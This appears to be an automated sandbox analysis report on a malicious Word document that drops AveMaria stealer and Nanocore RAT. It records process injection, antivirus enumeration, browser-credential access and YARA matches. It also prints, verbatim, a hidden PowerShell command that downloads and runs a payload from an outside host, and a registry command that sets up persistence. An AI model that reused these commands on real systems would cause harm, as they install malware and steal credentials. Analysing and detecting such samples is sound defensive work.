        Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' -NoP -sta -NonI -W Hidden -ExecutionPolicy bypass -NoLogo -command '(New-Object System.Net.WebClient).DownloadFile('httP://newhosteeeee.ydns.eu/putty.exe','C:\Users\user\AppData\Roaming\putty.exe');Start-Process 'C:\Users\user\AppData\Roaming\putty.exe''
        Contains functionality to inject threads in other processesShow sources
        Source: C:\Users\user\AppData\Roaming\putty.exeCode function: 13_2_00407B2E OpenProcess,GetCurrentProcess,MessageBoxA,VirtualAllocEx,VirtualAllocEx,VirtualProtectEx,VirtualAllocEx,WriteProcessMemory,WriteProcessMemory,CreateRemoteThread,
        Source: C:\Users\user\AppData\Roaming\putty.exeCode function: 13_2_00407D5E OpenProcess,VirtualAllocEx,VirtualProtectEx,VirtualAllocEx,WriteProcessMemory,WriteProcessMemory,CreateRemoteThread,
        Source: C:\Users\user\AppData\Roaming\putty.exeCode function: 13_2_00413F7F RegSetValueExA,OpenProcess,GetCurrentProcessId,GetModuleFileNameA,VirtualAllocEx,VirtualAllocEx,WriteProcessMemory,WriteProcessMemory,VirtualProtectEx,VirtualAllocEx,WriteProcessMemory,CreateRemoteThread,
        Source: C:\Users\user\AppData\Roaming\putty.exeCode function: 15_2_00407B2E OpenProcess,GetCurrentProcess,MessageBoxA,VirtualAllocEx,VirtualAllocEx,VirtualProtectEx,VirtualAllocEx,WriteProcessMemory,WriteProcessMemory,CreateRemoteThread,
        Source: C:\Users\user\AppData\Roaming\putty.exeCode function: 15_2_00407D5E OpenProcess,VirtualAllocEx,VirtualProtectEx,VirtualAllocEx,WriteProcessMemory,WriteProcessMemory,CreateRemoteThread,
        Source: C:\Users\user\AppData\Roaming\putty.exeCode function: 15_2_00413F7F RegSetValueExA,OpenProcess,GetCurrentProcessId,GetModuleFileNameA,VirtualAllocEx,VirtualAllocEx,WriteProcessMemory,WriteProcessMemory,VirtualProtectEx,VirtualAllocEx,WriteProcessMemory,CreateRemoteThread,
        Creates a thread in another existing process (thread injection)Show sources
        Source: C:\ProgramData\images.exeThread created: C:\Windows\SysWOW64\cmd.exe EIP: 12010E
        Injects a PE file into a foreign processesShow sources
        Source: C:\Users\user\AppData\Roaming\putty.exeMemory written: C:\Users\user\AppData\Roaming\putty.exe base: 400000 value starts with: 4D5A
        Source: C:\Users\user\AppData\Roaming\putty.exeMemory written: C:\Users\user\AppData\Roaming\putty.exe base: 400000 value starts with: 4D5A
        Source: C:\ProgramData\images.exeMemory written: C:\ProgramData\images.exe base: 400000 value starts with: 4D5A
        Source: C:\Users\user\AppData\Roaming\iBCrDCK.i.exeMemory written: C:\Users\user\AppData\Roaming\iBCrDCK.i.exe base: 400000 value starts with: 4D5A
        Injects files into Windows applicationShow sources
        Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEInjected file: C:\Users\user\AppData\Local\GDIPFONTCACHEV1.DAT was created by C:\Users\user\AppData\Roaming\putty.exe
        Source: C:\Windows\System32\notepad.exeInjected file: C:\Users\user\AppData\Local\Temp\abdtfhghgdghgh .ScT was created by C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
        Writes to foreign memory regionsShow sources
        Source: C:\ProgramData\images.exeMemory written: C:\Windows\SysWOW64\cmd.exe base: 120000
        Source: C:\ProgramData\images.exeMemory written: C:\Windows\SysWOW64\cmd.exe base: 130000
        Source: C:\Users\user\AppData\Roaming\putty.exeCode function: RegSetValueExA,CreateToolhelp32Snapshot,Process32First,Process32Next,CloseHandle, explorer.exe
        Source: C:\Users\user\AppData\Roaming\putty.exeCode function: RegSetValueExA,CreateToolhelp32Snapshot,Process32First,Process32Next,CloseHandle, explorer.exe
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Users\user\AppData\Roaming\putty.exe 'C:\Users\user\AppData\Roaming\putty.exe'
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Users\user\AppData\Roaming\putty.exe 'C:\Users\user\AppData\Roaming\putty.exe'
        Source: C:\Users\user\AppData\Roaming\putty.exeProcess created: C:\Users\user\AppData\Roaming\putty.exe C:\Users\user\AppData\Roaming\putty.exe
        Source: C:\Users\user\AppData\Roaming\putty.exeProcess created: C:\Users\user\AppData\Roaming\putty.exe C:\Users\user\AppData\Roaming\putty.exe
        Source: C:\Users\user\AppData\Roaming\putty.exeProcess created: C:\Users\user\AppData\Roaming\putty.exe C:\Users\user\AppData\Roaming\putty.exe
        Source: C:\Users\user\AppData\Roaming\putty.exeProcess created: C:\Users\user\AppData\Roaming\putty.exe C:\Users\user\AppData\Roaming\putty.exe
        Source: C:\Users\user\AppData\Roaming\putty.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c REG ADD 'HKCU\Software\Microsoft\Windows NT\CurrentVersion\Windows' /f /v Load /t REG_SZ /d 'C:\ProgramData\images.exe'
        Source: C:\Users\user\AppData\Roaming\putty.exeProcess created: C:\ProgramData\images.exe C:\ProgramData\images.exe
        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe REG ADD 'HKCU\Software\Microsoft\Windows NT\CurrentVersion\Windows' /f /v Load /t REG_SZ /d 'C:\ProgramData\images.exe'
        Source: C:\ProgramData\images.exeProcess created: C:\ProgramData\images.exe C:\ProgramData\images.exe
        Source: C:\ProgramData\images.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\System32\cmd.exe
        Source: C:\ProgramData\images.exeProcess created: C:\Users\user\AppData\Roaming\iBCrDCK.i.exe 'C:\Users\user\AppData\Roaming\iBCrDCK.i.exe'
        Source: C:\Users\user\AppData\Roaming\iBCrDCK.i.exeProcess created: C:\Users\user\AppData\Roaming\iBCrDCK.i.exe C:\Users\user\AppData\Roaming\iBCrDCK.i.exe
        Source: C:\Users\user\AppData\Roaming\iBCrDCK.i.exeProcess created: C:\Users\user\AppData\Roaming\iBCrDCK.i.exe C:\Users\user\AppData\Roaming\iBCrDCK.i.exe
        Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' -NoP -sta -NonI -W Hidden -ExecutionPolicy bypass -NoLogo -command '(New-Object System.Net.WebClient).DownloadFile('httP://newhosteeeee.ydns.eu/putty.exe','C:\Users\user\AppData\Roaming\putty.exe');Start-Process 'C:\Users\user\AppData\Roaming\putty.exe''
        Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' -NoP -sta -NonI -W Hidden -ExecutionPolicy bypass -NoLogo -command '(New-Object System.Net.WebClient).DownloadFile('httP://newhosteeeee.ydns.eu/putty.exe','C:\Users\user\AppData\Roaming\putty.exe');Start-Process 'C:\Users\user\AppData\Roaming\putty.exe''
        Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' -NoP -sta -NonI -W Hidden -ExecutionPolicy bypass -NoLogo -command '(New-Object System.Net.WebClient).DownloadFile('httP://newhosteeeee.ydns.eu/putty.exe','C:\Users\user\AppData\Roaming\putty.exe');Start-Process 'C:\Users\user\AppData\Roaming\putty.exe''
        Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' -NoP -sta -NonI -W Hidden -ExecutionPolicy bypass -NoLogo -command '(New-Object System.Net.WebClient).DownloadFile('httP://newhosteeeee.ydns.eu/putty.exe','C:\Users\user\AppData\Roaming\putty.exe');Start-Process 'C:\Users\user\AppData\Roaming\putty.exe''
        Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' -NoP -sta -NonI -W Hidden -ExecutionPolicy bypass -NoLogo -command '(New-Object System.Net.WebClient).DownloadFile('httP://newhosteeeee.ydns.eu/putty.exe','C:\Users\user\AppData\Roaming\putty.exe');Start-Process 'C:\Users\user\AppData\Roaming\putty.exe''
        Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' -NoP -sta -NonI -W Hidden -ExecutionPolicy bypass -NoLogo -command '(New-Object System.Net.WebClient).DownloadFile('httP://newhosteeeee.ydns.eu/putty.exe','C:\Users\user\AppData\Roaming\putty.exe');Start-Process 'C:\Users\user\AppData\Roaming\putty.exe''
        Source: C:\Users\user\AppData\Roaming\putty.exeCode function: 13_2_00412E91 InitializeSecurityDescriptor,SetSecurityDescriptorDacl,RegCreateKeyExA,RegCloseKey,SetLastError,
        Source: C:\Users\user\AppData\Roaming\putty.exeCode function: 13_2_00410A8C AllocateAndInitializeSid,LookupAccountSidW,GetLastError,FreeSid,
        Source: images.exeBinary or memory string: GetProgmanWindow
        Source: images.exeBinary or memory string: SetProgmanWindow
        Source: C:\Users\user\AppData\Roaming\putty.exeCode function: 13_2_00410E5E cpuid
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\powershell_ise.exe VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\hh.exe VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
        Source: C:\Program Files\Common Files\Microsoft Shared\OFFICE14\FLTLDR.EXEQueries volume information: C:\Users\user\AppData\Local\Temp\OICE_9306262C-FECE-4A9E-949D-FCC308D5F5A8.0\FLD93F.tmp VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\powershell_ise.exe VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\hh.exe VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\powershell_ise.exe VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\hh.exe VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
        Source: C:\ProgramData\images.exeQueries volume information: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\7xwghk55.default\secmod.db VolumeInformation
        Source: C:\ProgramData\images.exeQueries volume information: C:\ VolumeInformation
        Source: C:\ProgramData\images.exeQueries volume information: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\7xwghk55.default\cert8.db VolumeInformation
        Source: C:\ProgramData\images.exeQueries volume information: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\7xwghk55.default\key3.db VolumeInformation
        Source: C:\Windows\System32\notepad.exeQueries volume information: C:\Users\user\AppData\Local\Temp\abdtfhghgdghgh .ScT VolumeInformation
        Source: C:\Users\user\AppData\Roaming\iBCrDCK.i.exeQueries volume information: C:\Users\user\AppData\Roaming\iBCrDCK.i.exe VolumeInformation
        Source: C:\Windows\System32\drvinst.exeQueries volume information: C:\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Common-Drivers-Package~31bf3856ad364e35~amd64~~6.1.7601.17514.cat VolumeInformation
        Source: C:\Users\user\AppData\Roaming\iBCrDCK.i.exeQueries volume information: C:\Users\user\AppData\Roaming\iBCrDCK.i.exe VolumeInformation
        Source: C:\Users\user\AppData\Roaming\putty.exeCode function: 13_2_00408D0F GetModuleHandleA,SHGetFolderPathW,lstrcatW,lstrcatW,CreateDirectoryW,lstrcpyW,lstrcatW,GetLocalTime,wsprintfW,CreateFileW,CloseHandle,RegisterClassW,CreateWindowExW,GetMessageA,GetMessageA,TranslateMessage,DispatchMessageA,GetMessageA,
        Source: C:\ProgramData\images.exeCode function: 21_3_042973C6 __lock,____lc_codepage_func,__getenv_helper_nolock,_free,_strlen,__malloc_crt,_strlen,_strcpy_s,__invoke_watson,_free,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,WideCharToMultiByte,
        Source: C:\ProgramData\images.exeCode function: 21_3_042394E0 GetVersionExW,MultiByteToWideChar,MultiByteToWideChar,_malloc,MultiByteToWideChar,_free,GetVersionExW,GetDiskFreeSpaceW,GetDiskFreeSpaceA,_free,
        Source: C:\Users\user\AppData\Roaming\putty.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

        Lowering of HIPS / PFW / Operating System Security Settings:

        barindex
        Increases the number of concurrent connection per server for Internet ExplorerShow sources
        Source: C:\Users\user\AppData\Roaming\putty.exeRegistry key created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings MaxConnectionsPerServer 10Jump to behavior
        Source: C:\Users\user\AppData\Roaming\putty.exeWMI Queries: IWbemServices::ExecQuery - SELECT DisplayName FROM AntiVirusProduct
        Source: C:\Users\user\AppData\Roaming\putty.exeWMI Queries: IWbemServices::ExecQuery - SELECT DisplayName FROM AntiSpywareProduct
        Source: C:\Users\user\AppData\Roaming\putty.exeWMI Queries: IWbemServices::ExecQuery - SELECT DisplayName FROM FirewallProduct
        Source: C:\Users\user\AppData\Roaming\putty.exeWMI Queries: IWbemServices::ExecQuery - SELECT DisplayName FROM AntiVirusProduct
        Source: C:\Users\user\AppData\Roaming\putty.exeWMI Queries: IWbemServices::ExecQuery - SELECT DisplayName FROM AntiSpywareProduct
        Source: C:\Users\user\AppData\Roaming\putty.exeWMI Queries: IWbemServices::ExecQuery - SELECT DisplayName FROM FirewallProduct
        Source: C:\Users\user\AppData\Roaming\putty.exeWMI Queries: IWbemServices::ExecQuery - SELECT DisplayName FROM AntiVirusProduct
        Source: C:\Users\user\AppData\Roaming\putty.exeWMI Queries: IWbemServices::ExecQuery - SELECT DisplayName FROM AntiSpywareProduct
        Source: C:\Users\user\AppData\Roaming\putty.exeWMI Queries: IWbemServices::ExecQuery - SELECT DisplayName FROM FirewallProduct
        Source: C:\Users\user\AppData\Roaming\putty.exeWMI Queries: IWbemServices::ExecQuery - SELECT DisplayName FROM AntiVirusProduct
        Source: C:\Users\user\AppData\Roaming\putty.exeWMI Queries: IWbemServices::ExecQuery - SELECT DisplayName FROM AntiSpywareProduct
        Source: C:\Users\user\AppData\Roaming\putty.exeWMI Queries: IWbemServices::ExecQuery - SELECT DisplayName FROM FirewallProduct
        Source: C:\Users\user\AppData\Roaming\putty.exeWMI Queries: IWbemServices::ExecQuery - SELECT DisplayName FROM AntiVirusProduct
        Source: C:\Users\user\AppData\Roaming\putty.exeWMI Queries: IWbemServices::ExecQuery - SELECT DisplayName FROM AntiSpywareProduct
        Source: C:\Users\user\AppData\Roaming\putty.exeWMI Queries: IWbemServices::ExecQuery - SELECT DisplayName FROM FirewallProduct
        Source: C:\Users\user\AppData\Roaming\putty.exeWMI Queries: IWbemServices::ExecQuery - SELECT DisplayName FROM AntiVirusProduct
        Source: C:\Users\user\AppData\Roaming\putty.exeWMI Queries: IWbemServices::ExecQuery - SELECT DisplayName FROM AntiSpywareProduct
        Source: C:\Users\user\AppData\Roaming\putty.exeWMI Queries: IWbemServices::ExecQuery - SELECT DisplayName FROM FirewallProduct
        Source: C:\Users\user\AppData\Roaming\putty.exeWMI Queries: IWbemServices::ExecQuery - SELECT DisplayName FROM AntiVirusProduct
        Source: C:\Users\user\AppData\Roaming\putty.exeWMI Queries: IWbemServices::ExecQuery - SELECT DisplayName FROM AntiSpywareProduct
        Source: C:\Users\user\AppData\Roaming\putty.exeWMI Queries: IWbemServices::ExecQuery - SELECT DisplayName FROM FirewallProduct
        Source: C:\Users\user\AppData\Roaming\putty.exeWMI Queries: IWbemServices::ExecQuery - SELECT DisplayName FROM AntiVirusProduct
        Source: C:\Users\user\AppData\Roaming\putty.exeWMI Queries: IWbemServices::ExecQuery - SELECT DisplayName FROM AntiSpywareProduct
        Source: C:\Users\user\AppData\Roaming\putty.exeWMI Queries: IWbemServices::ExecQuery - SELECT DisplayName FROM FirewallProduct
        Source: C:\Users\user\AppData\Roaming\putty.exeWMI Queries: IWbemServices::ExecQuery - SELECT DisplayName FROM AntiVirusProduct
        Source: C:\Users\user\AppData\Roaming\putty.exeWMI Queries: IWbemServices::ExecQuery - SELECT DisplayName FROM AntiSpywareProduct
        Source: C:\Users\user\AppData\Roaming\putty.exeWMI Queries: IWbemServices::ExecQuery - SELECT DisplayName FROM FirewallProduct
        Source: C:\Users\user\AppData\Roaming\iBCrDCK.i.exeWMI Queries: IWbemServices::ExecQuery - SELECT DisplayName FROM AntiVirusProduct
        Source: C:\Users\user\AppData\Roaming\iBCrDCK.i.exeWMI Queries: IWbemServices::ExecQuery - SELECT DisplayName FROM AntiSpywareProduct
        Source: C:\Users\user\AppData\Roaming\iBCrDCK.i.exeWMI Queries: IWbemServices::ExecQuery - SELECT DisplayName FROM FirewallProduct
        Source: C:\Users\user\AppData\Roaming\iBCrDCK.i.exeWMI Queries: IWbemServices::ExecQuery - SELECT DisplayName FROM AntiVirusProduct
        Source: C:\Users\user\AppData\Roaming\iBCrDCK.i.exeWMI Queries: IWbemServices::ExecQuery - SELECT DisplayName FROM AntiSpywareProduct
        Source: C:\Users\user\AppData\Roaming\iBCrDCK.i.exeWMI Queries: IWbemServices::ExecQuery - SELECT DisplayName FROM FirewallProduct
        Source: C:\Users\user\AppData\Roaming\iBCrDCK.i.exeWMI Queries: IWbemServices::ExecQuery - SELECT DisplayName FROM AntiVirusProduct
        Source: C:\Users\user\AppData\Roaming\iBCrDCK.i.exeWMI Queries: IWbemServices::ExecQuery - SELECT DisplayName FROM AntiSpywareProduct
        Source: C:\Users\user\AppData\Roaming\iBCrDCK.i.exeWMI Queries: IWbemServices::ExecQuery - SELECT DisplayName FROM FirewallProduct
        Source: C:\Users\user\AppData\Roaming\iBCrDCK.i.exeWMI Queries: IWbemServices::ExecQuery - SELECT DisplayName FROM AntiVirusProduct
        Source: C:\Users\user\AppData\Roaming\iBCrDCK.i.exeWMI Queries: IWbemServices::ExecQuery - SELECT DisplayName FROM AntiSpywareProduct
        Source: C:\Users\user\AppData\Roaming\iBCrDCK.i.exeWMI Queries: IWbemServices::ExecQuery - SELECT DisplayName FROM FirewallProduct
        Source: C:\Users\user\AppData\Roaming\iBCrDCK.i.exeWMI Queries: IWbemServices::ExecQuery - SELECT DisplayName FROM AntiVirusProduct
        Source: C:\Users\user\AppData\Roaming\iBCrDCK.i.exeWMI Queries: IWbemServices::ExecQuery - SELECT DisplayName FROM AntiSpywareProduct
        Source: C:\Users\user\AppData\Roaming\iBCrDCK.i.exeWMI Queries: IWbemServices::ExecQuery - SELECT DisplayName FROM FirewallProduct
        Source: C:\Users\user\AppData\Roaming\iBCrDCK.i.exeWMI Queries: IWbemServices::ExecQuery - SELECT DisplayName FROM AntiVirusProduct
        Source: C:\Users\user\AppData\Roaming\iBCrDCK.i.exeWMI Queries: IWbemServices::ExecQuery - SELECT DisplayName FROM AntiSpywareProduct
        Source: C:\Users\user\AppData\Roaming\iBCrDCK.i.exeWMI Queries: IWbemServices::ExecQuery - SELECT DisplayName FROM FirewallProduct
        Source: C:\Users\user\AppData\Roaming\iBCrDCK.i.exeWMI Queries: IWbemServices::ExecQuery - SELECT DisplayName FROM AntiVirusProduct
        Source: C:\Users\user\AppData\Roaming\iBCrDCK.i.exeWMI Queries: IWbemServices::ExecQuery - SELECT DisplayName FROM AntiSpywareProduct
        Source: C:\Users\user\AppData\Roaming\iBCrDCK.i.exeWMI Queries: IWbemServices::ExecQuery - SELECT DisplayName FROM FirewallProduct
        Source: C:\Users\user\AppData\Roaming\iBCrDCK.i.exeWMI Queries: IWbemServices::ExecQuery - SELECT DisplayName FROM AntiVirusProduct
        Source: C:\Users\user\AppData\Roaming\iBCrDCK.i.exeWMI Queries: IWbemServices::ExecQuery - SELECT DisplayName FROM AntiSpywareProduct
        Source: C:\Users\user\AppData\Roaming\iBCrDCK.i.exeWMI Queries: IWbemServices::ExecQuery - SELECT DisplayName FROM FirewallProduct
        Source: C:\Users\user\AppData\Roaming\iBCrDCK.i.exeWMI Queries: IWbemServices::ExecQuery - SELECT DisplayName FROM AntiVirusProduct
        Source: C:\Users\user\AppData\Roaming\iBCrDCK.i.exeWMI Queries: IWbemServices::ExecQuery - SELECT DisplayName FROM AntiSpywareProduct
        Source: C:\Users\user\AppData\Roaming\iBCrDCK.i.exeWMI Queries: IWbemServices::ExecQuery - SELECT DisplayName FROM FirewallProduct

        Stealing of Sensitive Information:

        barindex
        Yara detected AveMaria stealerShow sources
        Source: Yara matchFile source: 21.2.images.exe.400000.1.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 17.2.images.exe.3b52b48.8.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 11.2.putty.exe.3802b48.7.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 17.2.images.exe.3b52b48.8.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 15.2.putty.exe.400000.1.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 15.2.putty.exe.400000.1.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 11.2.putty.exe.3751b08.8.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 10.2.putty.exe.3791b08.7.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 17.2.images.exe.3aa1b08.9.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 21.3.images.exe.6115d8.0.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 10.2.putty.exe.3842b48.8.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 21.3.images.exe.61381d.6.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 11.2.putty.exe.3802b48.7.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 21.2.images.exe.400000.1.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 13.2.putty.exe.400000.3.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 10.2.putty.exe.3842b48.8.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 21.3.images.exe.6115d8.8.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 00000015.00000003.2137169067.0000000000613000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000015.00000002.2353065694.0000000000400000.00000040.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000015.00000003.2137304291.0000000000607000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 0000000A.00000002.2119294130.0000000002637000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 0000000F.00000002.2119927907.0000000000400000.00000040.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 0000000A.00000002.2122718897.0000000003601000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000015.00000003.2137077371.0000000000603000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 0000000B.00000002.2119646724.00000000025F7000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 0000000D.00000003.2118755811.00000000005B6000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 0000000D.00000003.2118971999.00000000005BD000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 0000000D.00000003.2119027493.00000000005C3000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000011.00000002.2139607287.0000000003911000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 0000000D.00000003.2118869644.00000000005B6000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 0000000D.00000003.2118769952.00000000005BD000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000011.00000002.2136747408.0000000002947000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000015.00000003.2137213660.0000000000607000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 0000000D.00000002.2123143696.0000000000400000.00000040.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 0000000D.00000003.2118879592.00000000005BD000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 0000000B.00000002.2123072051.00000000035C1000.00000004.00000001.sdmp, type: MEMORY
        Yara detected Nanocore RATShow sources
        Source: Yara matchFile source: 34.2.iBCrDCK.i.exe.34ffadc.25.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 34.2.iBCrDCK.i.exe.440000.4.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 34.2.iBCrDCK.i.exe.34ffadc.25.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 34.2.iBCrDCK.i.exe.34faca6.27.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 34.2.iBCrDCK.i.exe.3504105.26.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 34.2.iBCrDCK.i.exe.368f7f4.28.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 34.2.iBCrDCK.i.exe.444629.3.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 34.2.iBCrDCK.i.exe.3680f50.30.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 34.2.iBCrDCK.i.exe.400000.2.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 00000022.00000002.2359934676.0000000003678000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000024.00000002.2300359769.0000000002491000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000022.00000002.2359482992.00000000034F9000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000024.00000002.2300423782.0000000003499000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000022.00000002.2355475529.00000000024B1000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000022.00000002.2353673485.0000000000402000.00000040.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000022.00000002.2353767111.0000000000440000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000024.00000002.2299296256.0000000000402000.00000040.00000001.sdmp, type: MEMORY
        Contains functionality to steal Chrome passwords or cookiesShow sources
        Source: C:\Users\user\AppData\Roaming\putty.exeCode function: \Google\Chrome\User Data\Default\Login Data
